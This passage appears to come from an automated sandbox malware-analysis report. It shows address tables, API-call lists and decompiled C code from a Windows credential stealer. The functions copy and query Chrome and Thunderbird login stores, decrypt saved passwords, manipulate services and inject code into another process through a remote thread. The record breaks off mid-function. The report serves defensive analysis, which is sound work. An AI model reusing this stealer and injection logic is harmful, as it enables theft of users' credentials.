                                      0x004092c2
                                      0x004092d8
                                      0x004092e0
                                      0x004092e9
                                      0x004092ee
                                      0x004092f1
                                      0x004096d1
                                      0x004096d1
                                      0x004096e2
                                      0x004096e8
                                      0x004096ea
                                      0x00000000
                                      0x00000000
                                      0x00409303
                                      0x0040930f
                                      0x00409317
                                      0x00409320
                                      0x00409323
                                      0x0040932f
                                      0x0040933e
                                      0x0040934a
                                      0x00409352
                                      0x00409356
                                      0x00409358
                                      0x0040936f
                                      0x00409372
                                      0x00409378
                                      0x0040937a
                                      0x00000000
                                      0x0040937c
                                      0x00409380
                                      0x00409383
                                      0x00409386
                                      0x00409388
                                      0x00000000
                                      0x0040938a
                                      0x00409391
                                      0x0040939e
                                      0x004093a5
                                      0x004093a9
                                      0x004093b6
                                      0x004093bd
                                      0x004093ca
                                      0x004093d2
                                      0x004093df
                                      0x004093e2
                                      0x004093e7
                                      0x004093ea
                                      0x004093f6
                                      0x004093f8
                                      0x00409401
                                      0x00409406
                                      0x00409406
                                      0x0040940f
                                      0x00409418
                                      0x0040941e
                                      0x00409423
                                      0x0040942f
                                      0x00409434
                                      0x0040943a
                                      0x0040943c
                                      0x0040944c
                                      0x00409450
                                      0x00409453
                                      0x00409460
                                      0x00409471
                                      0x00409476
                                      0x00409485
                                      0x00409487
                                      0x0040948a
                                      0x0040948f
                                      0x00409492
                                      0x00409497
                                      0x00409499
                                      0x0040965a
                                      0x0040965a
                                      0x0040949f
                                      0x0040949f
                                      0x004094a2
                                      0x004094a2
                                      0x004094a4
                                      0x004094a7
                                      0x004094b0
                                      0x004094b3
                                      0x004094b6
                                      0x004094b9
                                      0x004094d0
                                      0x004094da
                                      0x004094e2
                                      0x004094f0
                                      0x00409507
                                      0x00409511
                                      0x00409519
                                      0x00409527
                                      0x00409539
                                      0x0040953e
                                      0x00409548
                                      0x00409550
                                      0x00409561
                                      0x00409572
                                      0x00409587
                                      0x0040958f
                                      0x00409597
                                      0x004095b7
                                      0x004095bf
                                      0x004095ca
                                      0x004095cd
                                      0x004095f2
                                      0x004095fa
                                      0x00409605
                                      0x00409608
                                      0x0040960d
                                      0x00409610
                                      0x0040961d
                                      0x00409624
                                      0x0040962c
                                      0x00409634
                                      0x0040963c
                                      0x00409641
                                      0x00409644
                                      0x00409649
                                      0x00409649
                                      0x00409649
                                      0x00409652
                                      0x00409655
                                      0x00409655
                                      0x0040965d
                                      0x00409663
                                      0x00409665
                                      0x0040966e
                                      0x00409673
                                      0x00409678
                                      0x00409682
                                      0x00409689
                                      0x0040968f
                                      0x00409694
                                      0x00409694
                                      0x0040969a
                                      0x004096a1
                                      0x004096a8
                                      0x004096ab
                                      0x004096b3
                                      0x004096b6
                                      0x004096be
                                      0x004096c3
                                      0x004096c3
                                      0x00409388
                                      0x0040935a
                                      0x0040935a
                                      0x0040935d
                                      0x00409365
                                      0x00409365
                                      0x004096c6
                                      0x004096c9
                                      0x004096cc
                                      0x004096cc
                                      0x004096f2
                                      0x004096fc
                                      0x004096fc
                                      0x004096fd
                                      0x00409282
                                      0x00409289
                                      0x00409297
                                      0x00000000
                                      0x00409299
                                      0x00409299
                                      0x00409299
                                      0x00409297
                                      0x00409705
                                      0x0040970c
                                      0x00409714
                                      0x0040971f

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040ABE2: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
                                        • Part of subcall function 0040ABE2: lstrcatW.KERNEL32 ref: 0040AC2C
                                        • Part of subcall function 0040ABE2: RegOpenKeyExW.ADVAPI32 ref: 0040AC45
                                        • Part of subcall function 0040ABE2: RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
                                        • Part of subcall function 0040ABE2: RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B
                                      • GetBinaryTypeW.KERNEL32 ref: 00409265
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 0040A190: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A1BE
                                        • Part of subcall function 0040A190: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A1C7
                                        • Part of subcall function 0040A190: PathFileExistsW.SHLWAPI(0040927E), ref: 0040A2B5
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 004096E2
                                        • Part of subcall function 0040A190: PathFileExistsW.SHLWAPI(0040927E), ref: 0040A311
                                        • Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,0040927E,?,00000104,00000000), ref: 0040A350
                                        • Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A35B
                                        • Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A366
                                        • Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A371
                                        • Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A37C
                                        • Part of subcall function 0040A190: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                      • API String ID: 1065485167-1863067114
                                      • Opcode ID: a6fea101c96028ee8d4eab0a8f768a8748663c25d0c6bd72b57e65a7c7cc4f06
                                      • Instruction ID: 76608c0a9dd13001c5c1291ab4823583e2da0a2b14709576b3baf5b643cc29c3
                                      • Opcode Fuzzy Hash: a6fea101c96028ee8d4eab0a8f768a8748663c25d0c6bd72b57e65a7c7cc4f06
                                      • Instruction Fuzzy Hash: E0E1E872A00218ABCB04EBA1DD929EEB779AF48305F10407EE406B71D2DE785E45DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040B64D(short** _a4) {
                                      				void* _t2;
                                      				int _t8;
                                      				void* _t13;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                      					if(_t13 != 0) {
                                      						if(StartServiceW(_t13, 0, 0) != 0) {
                                      							L6:
                                      							_t15 = 1;
                                      							L7:
                                      							CloseServiceHandle(_t17);
                                      							CloseServiceHandle(_t13);
                                      							_t8 = _t15;
                                      							L8:
                                      							return _t8;
                                      						}
                                      						if(GetLastError() != 0x420) {
                                      							goto L7;
                                      						}
                                      						Sleep(0x7d0);
                                      						if(StartServiceW(_t13, 0, 0) == 0) {
                                      							goto L7;
                                      						}
                                      						goto L6;
                                      					}
                                      					CloseServiceHandle(_t17);
                                      					_t8 = 0;
                                      					goto L8;
                                      				}
                                      				return _t2;
                                      			}








                                      0x0040b659
                                      0x0040b65c
                                      0x0040b662
                                      0x0040b666
                                      0x0040b677
                                      0x0040b67b
                                      0x0040b693
                                      0x0040b6ba
                                      0x0040b6bc
                                      0x0040b6bd
                                      0x0040b6c4
                                      0x0040b6c7
                                      0x0040b6c9
                                      0x0040b6cb
                                      0x00000000
                                      0x0040b6cb
                                      0x0040b6a0
                                      0x00000000
                                      0x00000000
                                      0x0040b6a7
                                      0x0040b6b8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040b6b8
                                      0x0040b67e
                                      0x0040b684
                                      0x00000000
                                      0x0040b684
                                      0x0040b6cf

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B65C
                                      • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040B671
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B67E
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040B68B
                                      • GetLastError.KERNEL32 ref: 0040B695
                                      • Sleep.KERNEL32(000007D0), ref: 0040B6A7
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040B6B0
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B6C4
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B6C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                      • String ID: ServicesActive
                                      • API String ID: 104619213-3071072050
                                      • Opcode ID: 7a2d813b2d2b31e7b12a59e783d5f538d9bd657ebd592841658045f2d1f7d19a
                                      • Instruction ID: ec19a78f52c12aad1481474b245b1fd78cd64b3684018ca5afe7afaa95a58ef4
                                      • Opcode Fuzzy Hash: 7a2d813b2d2b31e7b12a59e783d5f538d9bd657ebd592841658045f2d1f7d19a
                                      • Instruction Fuzzy Hash: 53017171200215B7D2215B769D4DE9B3E6CEBC9751B008936FA01E6290CBB5C811C7BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E0040BBA0(intOrPtr __ecx) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v16;
                                      				char _v20;
                                      				short* _v24;
                                      				signed int _v28;
                                      				short** _v32;
                                      				short* _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr* _t66;
                                      				char* _t69;
                                      				void* _t90;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t92;
                                      				intOrPtr _t105;
                                      				intOrPtr* _t112;
                                      				intOrPtr _t113;
                                      				char _t114;
                                      				signed int _t115;
                                      				signed int _t116;
                                      				void* _t117;
                                      				void* _t119;
                                      
                                      				_t113 = __ecx;
                                      				_v44 = __ecx;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v36 = 0;
                                      				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      				if(_t90 == 0) {
                                      					L9:
                                      					_v40 = _v40 & 0x00000000;
                                      					L10:
                                      					E004058FB(_v24);
                                      					return _v40;
                                      				}
                                      				_v40 = 1;
                                      				_v32 = _t113 + 0x28;
                                      				while(1) {
                                      					L2:
                                      					_v16 = 0;
                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                      					_t114 = _v20;
                                      					_t66 = E00405955(_t114);
                                      					_t112 = _t66;
                                      					_t69 =  &_v20;
                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                      					if(_t69 == 0 && GetLastError() != 0xea) {
                                      						goto L9;
                                      					}
                                      					CloseServiceHandle(_t90);
                                      					_t115 = 0;
                                      					if(_v8 <= 0) {
                                      						goto L9;
                                      					}
                                      					_t91 = _t112;
                                      					while( *_t91 != 0) {
                                      						E004033AB( &_v12,  *_t91);
                                      						if(E0040300E( &_v12, _v32) != 0) {
                                      							_t116 = _t115 * 0x2c;
                                      							E004031FD( &_v24, E004033AB( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                      							E004058FB(_v28);
                                      							_t92 = _v44;
                                      							_v28 = _v28 & 0x00000000;
                                      							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                      							E004058FB(_v12);
                                      							_v12 = _v12 & 0x00000000;
                                      							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                      								_t105 = _v8;
                                      								_t117 = 0;
                                      								if(_t105 == 0) {
                                      									goto L10;
                                      								}
                                      								while( *_t112 != 0) {
                                      									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                      										L21:
                                      										_t117 = _t117 + 1;
                                      										_t112 = _t112 + 0x2c;
                                      										if(_t117 < _t105) {
                                      											continue;
                                      										}
                                      										goto L10;
                                      									}
                                      									E004033AB( &_v12,  *_t112);
                                      									if(lstrcmpW(_v12, _v24) != 0) {
                                      										E004033AB(_t119,  *_t112);
                                      										E00402100(_t92 + 0x40,  &_v12);
                                      									}
                                      									E004058FB(_v12);
                                      									_v12 = _v12 & 0x00000000;
                                      									_t105 = _v8;
                                      									goto L21;
                                      								}
                                      								goto L10;
                                      							}
                                      							if(_v36 == 1) {
                                      								goto L9;
                                      							}
                                      							E0040B5E1(_v32, 2);
                                      							E0040B64D(_v32);
                                      							_v36 = 1;
                                      							E004010C1(_t112);
                                      							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      							if(_t90 != 0) {
                                      								goto L2;
                                      							}
                                      							goto L9;
                                      						}
                                      						E004058FB(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      						_t91 = _t91 + 0x2c;
                                      						_t115 = _t115 + 1;
                                      						if(_t115 < _v8) {
                                      							continue;
                                      						}
                                      						goto L9;
                                      					}
                                      					goto L9;
                                      				}
                                      				goto L9;
                                      			}


























                                      0x0040bbab
                                      0x0040bbb5
                                      0x0040bbb8
                                      0x0040bbbb
                                      0x0040bbbe
                                      0x0040bbc1
                                      0x0040bbc4
                                      0x0040bbcd
                                      0x0040bbd1
                                      0x0040bc81
                                      0x0040bc81
                                      0x0040bc85
                                      0x0040bc88
                                      0x0040bc94
                                      0x0040bc94
                                      0x0040bbda
                                      0x0040bbe1
                                      0x0040bbe4
                                      0x0040bbe4
                                      0x0040bbee
                                      0x0040bbfe
                                      0x0040bc04
                                      0x0040bc09
                                      0x0040bc10
                                      0x0040bc1a
                                      0x0040bc27
                                      0x0040bc2f
                                      0x00000000
                                      0x00000000
                                      0x0040bc3f
                                      0x0040bc45
                                      0x0040bc4a
                                      0x00000000
                                      0x00000000
                                      0x0040bc4c
                                      0x0040bc4e
                                      0x0040bc58
                                      0x0040bc6a
                                      0x0040bc95
                                      0x0040bca7
                                      0x0040bcaf
                                      0x0040bcb4
                                      0x0040bcbe
                                      0x0040bcc2
                                      0x0040bcc5
                                      0x0040bcca
                                      0x0040bcd2
                                      0x0040bd15
                                      0x0040bd18
                                      0x0040bd1c
                                      0x00000000
                                      0x00000000
                                      0x0040bd22
                                      0x0040bd31
                                      0x0040bd6e
                                      0x0040bd6e
                                      0x0040bd6f
                                      0x0040bd74
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040bd76
                                      0x0040bd38
                                      0x0040bd4b
                                      0x0040bd52
                                      0x0040bd5a
                                      0x0040bd5a
                                      0x0040bd62
                                      0x0040bd67
                                      0x0040bd6b
                                      0x00000000
                                      0x0040bd6b
                                      0x00000000
                                      0x0040bd22
                                      0x0040bcda
                                      0x00000000
                                      0x00000000
                                      0x0040bce2
                                      0x0040bce8
                                      0x0040bcee
                                      0x0040bcf1
                                      0x0040bd06
                                      0x0040bd0a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040bd10
                                      0x0040bc6f
                                      0x0040bc74
                                      0x0040bc78
                                      0x0040bc7b
                                      0x0040bc7f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040bc7f
                                      0x00000000
                                      0x0040bc4e
                                      0x00000000

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040BBC7
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040BBFE
                                        • Part of subcall function 00405955: GetProcessHeap.KERNEL32(00000000,?,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405958
                                        • Part of subcall function 00405955: RtlAllocateHeap.NTDLL(00000000,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000,?,?,00000000), ref: 0040595F
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040BC27
                                      • GetLastError.KERNEL32 ref: 0040BC31
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040BC3F
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040BD00
                                      • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040BD43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                      • String ID: ServicesActive
                                      • API String ID: 899334174-3071072050
                                      • Opcode ID: 6688011a7adf512e3efe4e48f9b707c9ee93e8548dfea5412579028a87b209c2
                                      • Instruction ID: 091077a69be1e387389f1815173640768f280a35bf81accc927e6a5b28d28e0a
                                      • Opcode Fuzzy Hash: 6688011a7adf512e3efe4e48f9b707c9ee93e8548dfea5412579028a87b209c2
                                      • Instruction Fuzzy Hash: 0D514D71D00209ABEB15DFA1CD95BEFBBB8EF18305F10417AE901B62D1DB785A41CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00408917(intOrPtr __ecx) {
                                      				char _v272;
                                      				struct _WIN32_FIND_DATAA _v592;
                                      				char _v856;
                                      				char _v1120;
                                      				intOrPtr _t31;
                                      				void* _t36;
                                      
                                      				_t31 = __ecx;
                                      				GetFullPathNameA(0x4166b0, 0x104,  &_v856, 0);
                                      				PathCombineA( &_v1120,  &_v856, "*");
                                      				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                      				if(_t36 != 0xffffffff) {
                                      					do {
                                      						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                      							PathCombineA( &_v272, 0x4166b0,  &(_v592.cFileName));
                                      							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                      							E00408606(_t31,  &_v272);
                                      						}
                                      					} while (FindNextFileA(_t36,  &_v592) != 0);
                                      				}
                                      				return 0;
                                      			}









                                      0x00408936
                                      0x00408938
                                      0x00408957
                                      0x0040896d
                                      0x00408972
                                      0x00408974
                                      0x00408980
                                      0x0040899e
                                      0x004089ad
                                      0x004089b8
                                      0x004089b8
                                      0x004089cb
                                      0x00408974
                                      0x004089d5

                                      APIs
                                      • GetFullPathNameA.KERNEL32(004166B0,00000104,?,00000000), ref: 00408938
                                      • PathCombineA.SHLWAPI(?,?,00413500), ref: 00408957
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00408967
                                      • PathCombineA.SHLWAPI(?,004166B0,0000002E), ref: 0040899E
                                      • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004089AD
                                        • Part of subcall function 00408606: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408623
                                        • Part of subcall function 00408606: GetLastError.KERNEL32 ref: 00408630
                                        • Part of subcall function 00408606: CloseHandle.KERNEL32(00000000), ref: 00408637
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 004089C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                      • String ID: .$Accounts\Account.rec0
                                      • API String ID: 3873318193-2526347284
                                      • Opcode ID: 28746f312aa6f1d593443a8bafe48a18979b16af2a8a209f12eaa21e16227ba0
                                      • Instruction ID: af4d2d7fb62061b5245a62fce9e84327f4f52bd8b75fa1df41cb451cf8fc475c
                                      • Opcode Fuzzy Hash: 28746f312aa6f1d593443a8bafe48a18979b16af2a8a209f12eaa21e16227ba0
                                      • Instruction Fuzzy Hash: D81133B190021C6BDB20DBA4DD89FEB7B6CEB44714F1045A7E645E3180D6789A84CF68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040F6ED(long __edx) {
                                      				void* _v8;
                                      				long _v12;
                                      				char _v268;
                                      				void _v272;
                                      				void* _t25;
                                      				void* _t27;
                                      				void* _t33;
                                      				void* _t37;
                                      
                                      				_t33 = OpenProcess(0x1fffff, 0, __edx);
                                      				_v8 = _t33;
                                      				_v272 = GetCurrentProcessId();
                                      				_t35 = E004010AD(0xff);
                                      				GetModuleFileNameA(0, _t13, 0xff);
                                      				E00401114( &_v268, _t35);
                                      				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
                                      				WriteProcessMemory(_t33, _t27,  &E00416178, 0x800, 0);
                                      				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
                                      				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
                                      				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                      				_t9 = _t27 + 0x10e; // 0x10e
                                      				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
                                      				 *0x4167b4 = _t25;
                                      				return _t25;
                                      			}











                                      0x0040f707
                                      0x0040f709
                                      0x0040f717
                                      0x0040f725
                                      0x0040f72a
                                      0x0040f738
                                      0x0040f762
                                      0x0040f76c
                                      0x0040f77d
                                      0x0040f798
                                      0x0040f7aa
                                      0x0040f7ae
                                      0x0040f7bd
                                      0x0040f7c5
                                      0x0040f7cc

                                      APIs
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0040F701
                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0040F70C
                                        • Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
                                        • Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0040F72A
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0040F754
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,00416178,00000800,00000000,?,?,00000000), ref: 0040F76C
                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0040F77D
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0040F794
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0040F7AA
                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0040F7BD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                      • String ID:
                                      • API String ID: 900395357-0
                                      • Opcode ID: 6f35c02e06d2280d8f7d5cd7375ef5cec8c89269c6f5a9685c312ea851288564
                                      • Instruction ID: 07a090dde3f9dd14525a07a3359b94bce5f9695ad8c3566792f372a643309deb
                                      • Opcode Fuzzy Hash: 6f35c02e06d2280d8f7d5cd7375ef5cec8c89269c6f5a9685c312ea851288564
                                      • Instruction Fuzzy Hash: 27218171640218BEFB209B51DD4BFEB7F6CEB45B50F204176B704AA0D0D6F06E408BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E0040ADBB(void* __ecx, void* __eflags) {
                                      				char _v8;
                                      				WCHAR* _v12;
                                      				char _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				void* _v72;
                                      				char _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				intOrPtr* _t127;
                                      				void* _t128;
                                      				signed int _t131;
                                      				void* _t135;
                                      				char _t136;
                                      				signed int _t141;
                                      				signed int _t142;
                                      				signed int _t143;
                                      				signed int _t144;
                                      				char _t171;
                                      				intOrPtr _t172;
                                      				signed int _t175;
                                      				signed int _t191;
                                      				void* _t260;
                                      				void* _t261;
                                      				void* _t262;
                                      				void* _t263;
                                      				signed int _t264;
                                      				void* _t267;
                                      				void* _t268;
                                      				void* _t269;
                                      
                                      				_t269 = __eflags;
                                      				_t263 = __ecx;
                                      				E00403185( &_v44, "SELECT * FROM logins");
                                      				_t260 = 0x1a;
                                      				E0040D51C( &_v12, _t260, _t269);
                                      				E00403230( &_v12, _t260, _t269, "\\");
                                      				_t261 = 8;
                                      				E004030FB( &_v12, _t269, E0040326D( &_v36, _t261, _t269));
                                      				E004058FB(_v36);
                                      				E00403230( &_v12, _t261, _t269, L".tmp");
                                      				_t262 = 0x1c;
                                      				E0040D51C( &_v20, _t262, _t269);
                                      				E00403230( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
                                      				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
                                      					L4:
                                      					_t264 = 0;
                                      					goto L5;
                                      				} else {
                                      					E004031FD( &_v20,  &_v12);
                                      					_t127 = E0040331A( &_v20,  &_v36);
                                      					_t128 =  *((intOrPtr*)(_t263 + 0x24))( *_t127,  &_v40, 2, 0);
                                      					_t208 = _v36;
                                      					_t268 = _t267 + 0x10;
                                      					E004058FB(_v36);
                                      					if(_t128 == 0) {
                                      						_t131 =  *((intOrPtr*)(_t263 + 0x30))(_v40, _v44, 0xffffffff,  &_v8, 0);
                                      						_t268 = _t268 + 0x14;
                                      						__eflags = _t131;
                                      						if(_t131 != 0) {
                                      							goto L3;
                                      						}
                                      						_t135 =  *((intOrPtr*)(_t263 + 0x3c))(_v8);
                                      						_t264 = 1;
                                      						while(1) {
                                      							__eflags = _t135 - 0x64;
                                      							if(_t135 != 0x64) {
                                      								break;
                                      							}
                                      							_v68 = _v68 & 0x00000000;
                                      							_t191 = 0;
                                      							_v64 = 0;
                                      							_t136 = E00405878(_t264);
                                      							_v16 = _t136;
                                      							E00403185( &_v24,  *((intOrPtr*)(_t263 + 0x38))(_v8, 0));
                                      							E00403185( &_v60,  *((intOrPtr*)(_t263 + 0x38))(_v8, _t264));
                                      							_t141 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 3);
                                      							__eflags = _t141;
                                      							if(_t141 > 0) {
                                      								E00402EEB( &_v16, E00403185( &_v48,  *((intOrPtr*)(_t263 + 0x38))(_v8, 3)));
                                      								E004058FB(_v48);
                                      							}
                                      							_t142 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 3);
                                      							__eflags = _t142;
                                      							if(_t142 > 0) {
                                      								E00402EEB( &_v16, E00403185( &_v52,  *((intOrPtr*)(_t263 + 0x38))(_v8, 3)));
                                      								E004058FB(_v52);
                                      							}
                                      							_t143 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
                                      							__eflags = _t143;
                                      							if(_t143 > 0) {
                                      								_t171 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
                                      								_v84 = _t171;
                                      								_t172 =  *((intOrPtr*)(_t263 + 0x4c))(_v8, 5);
                                      								_t268 = _t268 + 0x10;
                                      								_v80 = _t172;
                                      								_t175 =  &_v84;
                                      								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
                                      								__eflags = _t175;
                                      								if(_t175 != 0) {
                                      									E00402D5A( &_v68, _v72, _v76);
                                      									LocalFree(_v72);
                                      									_t191 = _v64;
                                      								}
                                      							}
                                      							_t144 = E00402E52( &_v16);
                                      							__eflags = _t144;
                                      							if(_t144 > 0) {
                                      								L17:
                                      								_v100 = 0;
                                      								_v96 = 0;
                                      								_v92 = 0;
                                      								__eflags = E00402E52( &_v24);
                                      								if(__eflags > 0) {
                                      									E004031FD( &_v100, E00402E63( &_v24, __eflags,  &_v28));
                                      									E004058FB(_v28);
